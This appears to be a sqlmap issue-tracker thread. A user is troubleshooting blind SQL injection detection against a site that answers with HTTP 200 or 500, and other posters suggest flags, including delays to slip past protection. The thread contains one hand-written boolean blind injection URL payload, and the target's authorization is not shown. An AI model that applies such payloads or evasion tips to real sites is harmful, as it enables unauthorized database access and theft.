how do you want to proceed? [(S)kip current test/(e)nd detection phase/(n)ext parameter/(c)hange verbosity/(q)uit]
[04:39:44] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 20 times
[04:39:44] [ERROR] user quit

[*] shutting down at 04:39:44`

[vayo8888]

Same white pages without any text, just different response codes.
HTTP/1.1 200 OK - True
HTTP/1.1 500 Internal Server Error - False

[vayo8888]

im try to put --code=200 --string="200 OK" but got error:
[04:54:24] [WARNING] you provided '200 OK' as the string to match, but such a string is not within the target URL raw response, sqlmap will carry on anyway

[AmericanY]

@vayo8888 **update sqlmap firstly by —update since you are using old version of sqlmap, that’s why sqlmap developer always require full information. Then restart by —flush-session

1- i noticed that you are talking about ORDER BY technique that you were able to use manually. so we are talking about UNION QUERY INJECTION NOT A BOOLEAN so correct it to be --technique=U

2- kindly confirm for me if you are dealing with any WAF protection using --identify-waf since i do see several 500 internal server error

3- use --delay= to avoid being captured by PROTECTION BLOCK MECHANISM sometimes it's success

4- in case if there's no string so better to use just --code=200

[vayo8888]

Ok, updated.
1 - --technique=U - why? i didnt see any page content while getting TRUE or FALSE, just changing codes (200 and 500) so i thinks this is blind, but im trying now use only UNION.

2 - There is no waf, codes 200 and 500 are clear TRUE and FALSE:

3 - Dont need this option, i also try manuall check any data (db name, table names, columns, just compare code output (just like example TRUE request: index.php?id=3800+and+1=(SELECT+1+FROM+im_settings+WHERE+id+REGEXP+%27^[1]%27+AND+ID=1))

4 - so, thats final question --code=200 - wont work

[vayo8888]

little donate to btc @stamparm
Anyway thanks for the program, it saved a lot of time.

[AmericanY]

@vayo8888

based on what you used order by technique and confirmed it without page content ?

try with --drop-set-cookie and --ignore-code=500

[vayo8888]

it simple to check in chrome, just look:

[vayo8888]

im check with --drop-set-cookie and --ignore-code=504, same result, skip good payloads:

Manual check this payloads (true and false) in browser:

[AmericanY]

@vayo8888

Well, after several test from my side, I noticed the same issue from my side, reported to @stamparm . wait for an update.

[stamparm]

@vayo8888 it is clear that cloudflare is doing its part here. Not sure why there is no warning of it after a WAF check in sqlmap. You are getting 500 for even benign requests. One more thing. This case is primitive for sqlmap to detect. Be sure that sqlmap does not need to tune it. You could send me a real URL to the miroslav@sqlmap.org if you want me to check why you haven't got the WAF warning.

[stamparm]

Just going to the URL displays a big ugly 504 Gateway timeout from Cloudflare. I am not sure why I am even trying to respond to this kind of Issues.